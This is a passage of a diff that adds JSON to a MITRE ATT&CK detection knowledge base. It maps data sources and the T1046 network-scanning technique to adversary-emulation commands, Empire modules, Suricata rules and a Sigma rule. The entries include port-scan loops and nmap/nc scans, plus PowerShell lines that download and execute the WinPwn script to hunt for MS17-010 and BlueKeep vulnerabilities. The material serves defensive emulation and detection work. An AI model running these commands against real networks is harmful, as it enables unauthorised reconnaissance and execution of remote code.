"Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1046", + "command_list": [ + "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "nmap -sS #{network_range} -p #{port}\ntelnet 192.168.1.1 #{port}\nnc -nv 192.168.1.1 #{port}\n", + "nmap -sS #{network_range} -p 80\ntelnet #{host} 80\nnc -nv #{host} 80\n", + "nmap -sS 192.168.1.0/24 -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "nmap #{host_to_scan}", + "nmap 127.0.0.1", + "python #{filename} -i 127.0.0.1\n", + "python PathToAtomicsFolder\\T1046\\src\\T1046.py -i #{host_ip}\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n", + "python3 scanner.py -i #{remote.host.ip}\n", + "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n", + "rcpping.exe -s 127.0.0.1 -t ncacn_np", + "rcpping.exe -s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "powershell/recon/find_fruit", + "powershell/situational_awareness/network/get_sql_instance_domain", + "powershell/situational_awareness/network/get_sql_server_info", + "powershell/situational_awareness/network/portscan", + "python/situational_awareness/network/find_fruit", + "python/situational_awareness/network/port_scan" + ], + "commands": [ + { + "command": "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS #{network_range} -p #{port}\ntelnet 192.168.1.1 #{port}\nnc -nv 192.168.1.1 #{port}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS #{network_range} -p 80\ntelnet #{host} 80\nnc -nv #{host} 80\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sS 192.168.1.0/24 -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap #{host_to_scan}", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap 127.0.0.1", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "python #{filename} -i 127.0.0.1\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "python PathToAtomicsFolder\\T1046\\src\\T1046.py -i #{host_ip}\n", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "source": "atomics/T1046/T1046.yaml", + "name": "Atomic Red Team Test - Network Service Scanning" + }, + { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n", + "source": "data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml", + "name": "Uses nmap to fingerprint services that were network accessible" + }, + { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "source": "data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml", + "name": "Use dropped scanner to find open popular ports" + }, + { + "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n", + "source": "data/abilities/discovery/5a4cb2be-2684-4801-9355-3a90c91e0004.yml", + "name": "Scans the local network for common open ports" + }, + { + "command": "rcpping.exe -s 127.0.0.1 -t ncacn_np", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "rcpping.exe -s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/recon/find_fruit", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_sql_instance_domain", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_sql_server_info", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/portscan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/find_fruit", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/port_scan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1046", + "display_name": "Network Service Scanning", + "atomic_tests": [ + { + "name": "Port Scan", + "auto_generated_guid": "68e907da-2539-48f6-9fc9-257a78c05540", + "description": "Scan ports to check for listening ports.\n\nUpon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "for port in {1..65535};\ndo\n echo >/dev/tcp/192.168.1.1/$port && echo \"port $port is open\" || echo \"port $port is closed\" : ;\ndone\n", + "name": "sh" + } + }, + { + "name": "Port Scan Nmap", + "auto_generated_guid": "515942b0-a09f-4163-a7bb-22fefb6f185f", + "description": "Scan ports to check for listening ports with Nmap.\n\nUpon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "host": { + "description": "Host to scan.", + "type": "String", + "default": "192.168.1.1" + }, + "port": { + "description": "Ports to scan.", + "type": "String", + "default": "80" + }, + "network_range": { + "description": "Network Range to Scan.", + "type": "String", + "default": "192.168.1.0/24" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if nmap command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v nmap)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" + }, + { + "description": "Check if nc command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v nc)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n" + }, + { + "description": "Check if telnet command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v telnet)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n" + } + ], + "executor": { + "command": "nmap -sS #{network_range} -p #{port}\ntelnet #{host} #{port}\nnc -nv #{host} #{port}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Port Scan NMap for Windows", + "auto_generated_guid": "d696a3cb-d7a8-4976-8eb5-5af4abf2e3df", + "description": "Scan ports to check for listening ports for the local host 127.0.0.1", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "nmap_url": { + "description": "NMap installer download URL", + "type": "Url", + "default": "https://nmap.org/dist/nmap-7.80-setup.exe" + }, + "host_to_scan": { + "description": "The host to scan with NMap", + "type": "String", + "default": "127.0.0.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NMap must be installed\n", + "prereq_command": "if (cmd /c \"nmap 2>nul\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\nmap-7.80-setup.exe #{nmap_url}\nStart-Process $env:temp\\nmap-7.80-setup.exe /S\n" + } + ], + "executor": { + "command": "nmap #{host_to_scan}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Port Scan using python", + "auto_generated_guid": "6ca45b04-9f15-4424-b9d3-84a217285a5c", + "description": "Scan ports to check for listening ports with python\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "host_ip": { + "description": "Host to scan.", + "type": "String", + "default": "127.0.0.1" + }, + "filename": { + "description": "Location of the project file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1046\\src\\T1046.py" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Check if python exists on the machine\n", + "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + } + ], + "executor": { + "command": "python #{filename} -i #{host_ip}\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - spoolvulnscan", + "auto_generated_guid": "54574908-f1de-4356-9021-8053dd57439a", + "description": "Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - MS17-10", + "auto_generated_guid": "97585b04-5be2-40e9-8c31-82157b8af2d6", + "description": "Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - bluekeep", + "auto_generated_guid": "1cca5640-32a9-46e6-b8e0-fabbe2384a73", + "description": "Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - fruit", + "auto_generated_guid": "bb037826-cbe8-4a41-93ea-b94059d6bb98", + "description": "Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nfruit -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "3a2ce3d5-e9e2-4344-ae23-470432ff8687", + "name": "Fingerprint network services", + "description": "Uses nmap to fingerprint services that were network accessible", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + "platforms": { + "darwin": { + "sh": { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n" + } + }, + "linux": { + "sh": { + "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n" + } + } + } + }, + { + "id": "47abe1f5-55a5-46cc-8cad-506dac8ea6d9", + "name": "Scan IP for ports", + "description": "Use dropped scanner to find open popular ports", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + "platforms": { + "darwin": { + "sh": { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.scan": [ + { + "source": "remote.host.ip", + "edge": "has_open_port", + "target": "remote.host.port" + } + ] + }, + "payloads": [ + "scanner.py" + ] + } + }, + "linux": { + "sh": { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.scan": [ + { + "source": "remote.host.ip", + "edge": "has_open_port", + "target": "remote.host.port" + } + ] + }, + "payloads": [ + "scanner.py" + ] + } + } + } + }, + { + "id": "5a4cb2be-2684-4801-9355-3a90c91e0004", + "name": "Network Service Scanning", + "description": "Scans the local network for common open ports", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n", + "payloads": [ + "basic_scanner.ps1" + ], + "timeout": 180 + } + } + } + }, + { + "chain_id": "100213", + "os": "windows", + "parent_process": "rcpping.exe", + "commandline_string": "-s 127.0.0.1 -t ncacn_np", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "network_service_scanning", + "mitre_attack": "T1046", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Rpcping.md" + }, + { + "chain_id": "100214", + "os": "windows", + "parent_process": "rcpping.exe", + "commandline_string": "-s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "network_service_scanning", + "mitre_attack": "T1046", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Rpcping.md" + }, + { + "Empire Module": "powershell/recon/find_fruit", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/recon/find_fruit\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_sql_instance_domain", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_sql_instance_domain\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_sql_server_info", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_sql_server_info\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/portscan", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/portscan\": [\"T1046\"]," + }, + { + "Empire Module": "python/situational_awareness/network/find_fruit", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/find_fruit\": [\"T1046\"]," + }, + { + "Empire Module": "python/situational_awareness/network/port_scan", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/port_scan\": [\"T1046\"]," + }, + { + "Rules": "ET Open", + "SID": "*", + "Signature": "ET SCAN *", + "Verified": "Yes" + }, + { + "Rules": "ET Open", + "SID": "*", + "Signature": "GPL SCAN *", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET SCAN *", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "GPL SCAN *", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth", + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*transport=dt_socket,address=*" + }, + "exclusion": [ + { + "CommandLine": "*address=127.0.0.1*" + }, + { + "CommandLine": "*address=localhost*" + } + ], + "condition": "selection and not exclusion" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service enumeration", + "description": "A cloud service was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud service" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": 